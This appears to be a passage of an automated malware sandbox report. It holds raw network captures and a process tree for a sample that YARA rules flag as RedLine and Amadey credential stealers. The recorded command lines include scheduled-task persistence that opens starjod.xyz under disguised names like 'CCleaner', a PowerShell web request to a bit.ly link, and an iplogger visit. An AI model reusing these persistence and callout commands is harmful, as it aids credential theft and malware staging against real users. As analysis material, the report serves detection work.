2024-06-27 03:58:59 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 55 b9 b5 c1 43 4f 6f 91 f3 6b cd 23 63 37 7d 31 9d c9 2b 83 bf 8b 9f d7 b3 ab 35 63 a7 29 87 b1 5d 09 f7 c1 c3 49 ab 13 55 6f cd e7 23 b9 45 d3 13 4b dd 03 05 39 e5 d3 35 69 77 a3 e5 fb 05 71 3d 8f 95 c1 43 b9 65 93 53 e9 4b 21 a3 29 5d 53 ad c7 2b 81 83 79 a5 31 93 db 7d 63 65 e9 9d b1 d5 39 6f c1 43 49 a7 11 4d a9 3d a1 27 bb c5 71 ef cb 7b 01 7d 1f 2f f1 35 db 8b a1 27 af 0d 11 55 99 b7 41 4f 57 27 b1 53 79 4d 21 a5 17 c7 7f 97 c9 f7 87 8f 8b ad 73 b3 67 1b e3 ed 5f fd 8f 73 f9 2b 41 4d c9 65 2f 55 a9 4f a1 ed 6f c7 77 17 39 d7 0f 03 09 2d bf 17 59 8b a1 63 a9 05 0f 2f 8f bb c1 43 b7 fb b1 55 1b cd 67 6f 19 bb 31 bd 49 2b 81 8f 89 6b f1 8d 69 0b 61 ad 3b 85 91 7d 09 15 cf 43 37 6f 11 cf e7 5b 67 dd 9f Data Ascii: UCOok#c7}1+5c)]IUo#EK95iwq=CeSK!)]S+y1}ce9oCIM='q{}/5'UAOW'SyM!sg_s+AMe/UOow9-Yc/CUgo1I+kia;}C7o[g
2024-06-27 03:58:59 UTC	16384	IN	Data Raw: 8d c3 ce 08 00 51 9a f1 01 ac 71 10 d7 90 5c 80 61 1f 26 e1 b6 08 0b 98 52 13 ae 86 21 21 7c 2b 06 11 8d 39 89 ea 37 9c 17 05 b5 3b 3a 67 82 42 83 92 62 19 f9 37 2f 73 16 6d 08 2f da 37 d8 be 7a 6b b0 69 3d 77 01 0c 59 7b 66 13 4f 62 a3 f1 68 ee 94 8a 32 74 82 54 22 5f af ca cc 0d 2e 9d af 05 28 39 70 83 a1 a4 4d 58 98 46 5d fd 33 f9 37 27 88 e9 e7 96 4f f7 24 2a c0 2d 96 0b 91 28 42 1a 51 27 23 82 8b 5c 96 07 ff 88 7b d4 df 04 af c4 1b 70 b7 88 19 3f f4 67 97 14 e1 ce ff 8a c1 54 5d 19 7e 1d 6a c8 19 39 97 38 6e e5 70 c2 be a9 df f7 94 99 86 ab 12 91 12 2f fc 5b d7 3a 79 90 6f e3 1e ad 53 89 35 68 82 aa 03 be f9 04 16 f3 a8 04 69 aa 4d 3a 78 5f a5 81 aa c5 74 a2 bd ea bb ca fb cb 37 1a 6d a6 51 61 76 bc 77 90 a5 0d dc 3c af f4 bf 7e 9c b0 c4 78 6b 28 67 Data Ascii: Qq\a&R!!\|+97;:gBb7/sm/7zki=wY{fObh2tT"_.(9pMXF]37'O$*-(BQ'#\{p?gT]~j98np/[:yoS5hiM:x_t7mQavw<~xk(g
2024-06-27 03:58:59 UTC	16384	IN	Data Raw: 60 57 31 8a dc 96 68 0a 9a 4a dc 7f 62 2f 13 fd b5 3c f6 92 c8 ca c1 a8 82 20 41 4a db c0 cd 26 ab f0 af bb 47 35 fc ba e6 2f bc 68 aa 48 89 05 30 59 4b 8f 38 00 f9 c4 b7 c0 75 b7 b1 f4 79 08 40 24 94 6f c3 69 b0 f8 ab 9d 6d 9a e2 07 58 8f e1 2e 53 bc 7b ef 24 47 c7 98 4d cf 55 15 e0 b9 8b 32 5a 78 80 60 e4 13 ce 95 4d 56 f9 81 e2 b4 99 b0 98 8d 9e 3b 79 83 9f 42 b9 38 da 57 a0 e3 12 5b 91 cf 84 54 42 8c 4f d6 9d 53 63 69 8a 18 81 62 44 a9 6e ee b9 9f 2b b6 87 c7 b3 1c 8d 1b 61 d5 e9 a2 9c 3b 60 bc d1 40 38 bd 35 1d 4e 1b b7 a8 16 6a b6 75 2f b6 ae e9 93 e5 63 97 13 fa f1 0f ca a8 eb b0 30 63 9b 24 01 bd 39 37 7d f6 e2 1a 8a 5c 12 ae 1d 33 f6 69 dd a1 40 0d ec 4e a3 07 24 89 66 a3 41 4b a6 41 e4 0d 23 87 5f 72 98 56 24 9f 88 55 3e 6a b8 69 83 cf de b3 4c Data Ascii: `W1hJb/< AJ&G5/hH0YK8uy@$oimX.S{$GMU2Zx`MV;yB8W[TBOScibDn+a;`@85Nju/c0c$97}\3i@N$fAKA#_rV$U>jiL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49745	67.199.248.11	443	7888	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:57 UTC	158	OUT	GET /4c7L8Zs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bit.ly Connection: Keep-Alive
2024-06-27 03:58:58 UTC	480	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 27 Jun 2024 03:58:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 105 Cache-Control: private, max-age=90 Content-Security-Policy: referrer always; Location: https://pixel.com/ Referrer-Policy: unsafe-url Set-Cookie: _bit=o5r3WW-bc8200dbd121a6d5f6-00o; Domain=bit.ly; Expires=Tue, 24 Dec 2024 03:58:58 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-27 03:58:58 UTC	105	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 63 6f 6d 2f 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://pixel.com/">moved here</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49747	54.67.42.145	443	7888	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:58:59 UTC	154	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pixel.com Connection: Keep-Alive
2024-06-27 03:58:59 UTC	229	IN	HTTP/1.1 200 OK Date: Thu, 27 Jun 2024 3:58:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 366 Cache-Control: private, no-cache, no-store, max-age=0 Expires: Mon, 01 Jan 1990 0:00:00 GMT
2024-06-27 03:58:59 UTC	366	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 50 69 78 65 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 69 78 65 6c 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 70 69 78 65 6c 2c 63 6f 6d 22 3e 3c 2f 68 65 61 64 3e 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 78 65 6c 2e 63 6f 6d 2f 70 69 78 2f 69 6e 64 65 78 2e 68 74 6d Data Ascii: <html><head><title>Pixel.com</title><meta name="description" content="Pixel.com"><meta name="keywords" content="pixel,com"></head><frameset rows="100%" border="0" framespacing="0" frameborder="0"><frame name="main" src="https://www.pixel.com/pix/index.htm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49769	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-06-27 03:59:13 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zgAu8AhbCZfWDEn&MD=ZxexwrtV HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-27 03:59:13 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: aec54d17-8745-4140-91d8-74627ce3f3aa MS-RequestId: e5c87870-247c-4fec-96c8-db2072a37b3f MS-CV: j7fTZOTdYkKtyWVg.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 27 Jun 2024 03:59:13 GMT Connection: close Content-Length: 30005
2024-06-27 03:59:13 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-06-27 03:59:13 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	1
Start time:	23:58:12
Start date:	26/06/2024
Path:	C:\Users\user\Desktop\1Vkf7silOj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1Vkf7silOj.exe"
Imagebase:	0x930000
File size:	304'128 bytes
MD5 hash:	CD581D68ED550455444EE6E099C44266
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.1308164877.0000000000932000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:58:12
Start date:	26/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	01:39:47
Start date:	27/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:39:48
Start date:	27/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:39:48
Start date:	27/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1880,i,1559005208409857201,3821663929955985099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:39:53
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\6.exe"
Imagebase:	0x7ff7b4ee0000
File size:	5'037'056 bytes
MD5 hash:	5BB3677A298D7977D73C2D47B805B9C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 54%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:39:56
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\7.exe"
Imagebase:	0xc50000
File size:	1'850'368 bytes
MD5 hash:	B60D82B8244E964110F66E7AD34DC37B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.1584978674.0000000005410000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.1627435742.0000000000C51000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:40:00
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe
Imagebase:	0x6b0000
File size:	1'850'368 bytes
MD5 hash:	B60D82B8244E964110F66E7AD34DC37B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.1635196355.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	01:40:00
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe"
Imagebase:	0x6b0000
File size:	1'850'368 bytes
MD5 hash:	B60D82B8244E964110F66E7AD34DC37B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.1678495437.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000003.1635383014.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:40:06
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000035001\gold.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000035001\gold.exe"
Imagebase:	0x150000
File size:	505'344 bytes
MD5 hash:	92C01627961859A84FFA633327C5D7F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:40:06
Start date:	27/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	01:40:06
Start date:	27/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:40:07
Start date:	27/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7752 -ip 7752
Imagebase:	0xcf0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:40:07
Start date:	27/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 320
Imagebase:	0xcf0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:40:08
Start date:	27/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	01:40:09
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe"
Imagebase:	0x5f0000
File size:	424'960 bytes
MD5 hash:	07101CAC5B9477BA636CD8CA7B9932CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.1698297314.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:40:11
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Imagebase:	0x80000
File size:	424'960 bytes
MD5 hash:	07101CAC5B9477BA636CD8CA7B9932CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.3789339584.0000000000081000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.1715094971.0000000000081000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	01:40:12
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Imagebase:	0x80000
File size:	424'960 bytes
MD5 hash:	07101CAC5B9477BA636CD8CA7B9932CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.1735836274.0000000000081000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000000.1725227418.0000000000081000.00000020.00000001.01000000.00000014.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:40:12
Start date:	27/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000091001\Installer.exe"
Imagebase:	0x7ff6d02f0000
File size:	158'208 bytes
MD5 hash:	5F331887BEC34F51CCA7EA78815621F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 34%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:40:12
Start date:	27/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ins.bat
Imagebase:	0x7ff7c0280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:40:12
Start date:	27/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:40:12
Start date:	27/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Imagebase:	0x7ff73e9b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:40:12
Start date:	27/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Imagebase:	0x7ff73e9b0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:40:13
Start date:	27/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:40:13
Start date:	27/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	01:40:14
Start date:	27/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:40:14
Start date:	27/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	01:40:14
Start date:	27/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1992,i,12647430490960773708,190328804482566679,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:40:15
Start date:	27/06/2024
